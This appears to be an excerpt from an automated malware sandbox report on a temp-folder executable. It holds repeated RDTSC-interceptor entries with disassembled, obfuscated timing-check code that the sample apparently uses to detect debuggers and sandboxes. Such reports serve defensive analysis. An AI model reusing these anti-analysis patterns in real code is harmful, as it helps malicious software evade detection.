                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D602FE second address: 4D6034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1C54A6EA5h 0x00000008 pop ecx 0x00000009 mov edx, 1ADAB124h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push ebx 0x00000015 call 00007FA1C54A6EA4h 0x0000001a pop ecx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007FA1C54A6E9Eh 0x00000023 pop ecx 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D8077B second address: 4D8078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Eh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D8078D second address: 4D807CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA1C54A6EA6h 0x00000011 mov ebp, esp 0x00000013 jmp 00007FA1C54A6EA0h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D807CF second address: 4D807D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D807D4 second address: 4D807DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D807DA second address: 4D807F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D807F8 second address: 4D80826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 4Ch 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FA1C54A6EA4h 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 pushad 0x00000017 mov esi, 593D039Dh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D80826 second address: 4D808B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 popad 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e mov dh, 98h 0x00000010 popad 0x00000011 je 00007FA2366C73C5h 0x00000017 pushad 0x00000018 mov cx, 3827h 0x0000001c mov di, ax 0x0000001f popad 0x00000020 mov ecx, eax 0x00000022 pushad 0x00000023 mov ebx, eax 0x00000025 pushfd 0x00000026 jmp 00007FA1C45142A0h 0x0000002b sub cx, 7688h 0x00000030 jmp 00007FA1C451429Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xor eax, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b call 00007FA1C45142A0h 0x00000040 mov bx, ax 0x00000043 pop esi 0x00000044 popad 0x00000045 and ecx, 1Fh 0x00000048 jmp 00007FA1C451429Dh 0x0000004d ror eax, cl 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FA1C45142A8h 0x00000058 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D808B5 second address: 4D808BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D808BB second address: 4D80919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1C45142A8h 0x00000014 xor si, 2008h 0x00000019 jmp 00007FA1C451429Bh 0x0000001e popfd 0x0000001f mov bx, si 0x00000022 popad 0x00000023 popad 0x00000024 retn 0004h 0x00000027 nop 0x00000028 mov esi, eax 0x0000002a lea eax, dword ptr [ebp-08h] 0x0000002d xor esi, dword ptr [00712014h] 0x00000033 push eax 0x00000034 push eax 0x00000035 push eax 0x00000036 lea eax, dword ptr [ebp-10h] 0x00000039 push eax 0x0000003a call 00007FA1C8BC4ADAh 0x0000003f push FFFFFFFEh 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA1C45142A1h 0x00000048 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30054 second address: 4D30078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C54A6EA8h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30078 second address: 4D3007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D3007C second address: 4D30082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30082 second address: 4D30088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30088 second address: 4D3008C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D3008C second address: 4D300A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1C451429Eh 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D300A9 second address: 4D300B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D300B8 second address: 4D300BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D300BE second address: 4D300C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D300C2 second address: 4D30130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA1C451429Ah 0x00000010 jmp 00007FA1C45142A5h 0x00000015 popfd 0x00000016 pushfd 0x00000017 jmp 00007FA1C45142A0h 0x0000001c sub esi, 42390968h 0x00000022 jmp 00007FA1C451429Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esp], ecx 0x0000002c jmp 00007FA1C45142A6h 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov cl, 05h 0x00000037 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30130 second address: 4D30152 instructions: 0x00000000 rdtsc 0x00000002 mov di, D60Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FA1C54A6EA1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30152 second address: 4D30165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30165 second address: 4D30194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1C54A6E9Dh 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30194 second address: 4D3021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FA1C45142A8h 0x0000000c or eax, 2C2D8548h 0x00000012 jmp 00007FA1C451429Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d jmp 00007FA1C45142A4h 0x00000022 mov ah, E2h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007FA1C451429Ch 0x0000002b xchg eax, esi 0x0000002c jmp 00007FA1C45142A0h 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA1C45142A7h 0x0000003b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D3021B second address: 4D302A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C54A6E9Fh 0x00000009 jmp 00007FA1C54A6EA3h 0x0000000e popfd 0x0000000f mov ax, D14Fh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 jmp 00007FA1C54A6EA0h 0x0000001d jmp 00007FA1C54A6EA2h 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FA1C54A6EA1h 0x0000002b or eax, 11277E96h 0x00000031 jmp 00007FA1C54A6EA1h 0x00000036 popfd 0x00000037 mov eax, 21386707h 0x0000003c popad 0x0000003d xchg eax, edi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D302A7 second address: 4D302B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D302B6 second address: 4D302BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D302BC second address: 4D302F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov ax, B1ADh 0x00000018 popad 0x00000019 je 00007FA2367125D0h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA1C451429Fh 0x00000026 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D302F2 second address: 4D30373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C54A6E9Fh 0x00000009 add eax, 4D96428Eh 0x0000000f jmp 00007FA1C54A6EA9h 0x00000014 popfd 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007FA1C54A6E9Ah 0x00000026 je 00007FA2376A5186h 0x0000002c jmp 00007FA1C54A6EA0h 0x00000031 mov edx, dword ptr [esi+44h] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007FA1C54A6E9Ch 0x0000003d and ch, 00000068h 0x00000040 jmp 00007FA1C54A6E9Bh 0x00000045 popfd 0x00000046 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30373 second address: 4D303B3 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushfd 0x00000008 jmp 00007FA1C45142A0h 0x0000000d or cl, FFFFFFC8h 0x00000010 jmp 00007FA1C451429Bh 0x00000015 popfd 0x00000016 pop esi 0x00000017 popad 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FA1C45142A2h 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D303B3 second address: 4D3046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007FA1C54A6EA6h 0x00000014 jne 00007FA2376A5140h 0x0000001a jmp 00007FA1C54A6EA0h 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA1C54A6E9Eh 0x0000002a adc al, FFFFFFE8h 0x0000002d jmp 00007FA1C54A6E9Bh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FA1C54A6EA8h 0x00000039 add cl, 00000048h 0x0000003c jmp 00007FA1C54A6E9Bh 0x00000041 popfd 0x00000042 popad 0x00000043 jne 00007FA2376A50F7h 0x00000049 pushad 0x0000004a call 00007FA1C54A6EA4h 0x0000004f push ecx 0x00000050 pop edx 0x00000051 pop eax 0x00000052 movsx ebx, ax 0x00000055 popad 0x00000056 test bl, 00000007h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D3046B second address: 4D30486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30486 second address: 4D3048C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2082E second address: 4D20833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20833 second address: 4D2086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FA1C54A6EA0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edi, 552C64C0h 0x0000001a mov eax, ebx 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2086C second address: 4D20893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C451429Eh 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20893 second address: 4D208FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C54A6EA1h 0x00000009 xor ecx, 56AB5626h 0x0000000f jmp 00007FA1C54A6EA1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA1C54A6EA0h 0x0000001b sbb ecx, 71200FC8h 0x00000021 jmp 00007FA1C54A6E9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FA1C54A6EA0h 0x00000034 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D208FB second address: 4D208FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D208FF second address: 4D20905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20905 second address: 4D20917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov esi, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20917 second address: 4D2091B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2091B second address: 4D20921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20921 second address: 4D20974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bx, 6DD0h 0x00000012 pop edx 0x00000013 mov eax, 210E4185h 0x00000018 popad 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov di, si 0x00000020 jmp 00007FA1C54A6E9Ah 0x00000025 popad 0x00000026 sub ebx, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA1C54A6EA3h 0x00000031 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20974 second address: 4D20978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20978 second address: 4D2097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2097E second address: 4D2098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C451429Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D2098D second address: 4D209E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1C54A6EA3h 0x00000016 xor esi, 1050499Eh 0x0000001c jmp 00007FA1C54A6EA9h 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D209E8 second address: 4D209EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D209EE second address: 4D20A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA2376AC82Eh 0x0000000e jmp 00007FA1C54A6EA5h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FA1C54A6E9Ch 0x00000021 and eax, 36610DF8h 0x00000027 jmp 00007FA1C54A6E9Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ecx, esi 0x00000030 pushad 0x00000031 jmp 00007FA1C54A6E9Bh 0x00000036 mov di, si 0x00000039 popad 0x0000003a je 00007FA2376AC7EEh 0x00000040 pushad 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 mov si, 74B3h 0x00000048 popad 0x00000049 jmp 00007FA1C54A6EA8h 0x0000004e popad 0x0000004f test byte ptr [76FB6968h], 00000002h 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20A80 second address: 4D20A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20A84 second address: 4D20AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20AA1 second address: 4D20B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA236719B96h 0x0000000f jmp 00007FA1C451429Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007FA1C45142A0h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FA1C45142A0h 0x00000022 push eax 0x00000023 jmp 00007FA1C451429Bh 0x00000028 xchg eax, ebx 0x00000029 jmp 00007FA1C45142A6h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA1C451429Ah 0x00000038 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20B20 second address: 4D20B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20B2F second address: 4D20B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C451429Ch 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20B5B second address: 4D20B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C54A6EA5h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20B82 second address: 4D20BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1C45142A7h 0x00000009 adc cx, 6A1Eh 0x0000000e jmp 00007FA1C45142A9h 0x00000013 popfd 0x00000014 mov ax, 67E7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20BCC second address: 4D20BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20BD0 second address: 4D20BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20BD6 second address: 4D20BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6E9Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D20BE7 second address: 4D20BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30DDB second address: 4D30DFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C54A6E9Ch 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30DFB second address: 4D30E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C45142A5h 0x00000011 rdtsc
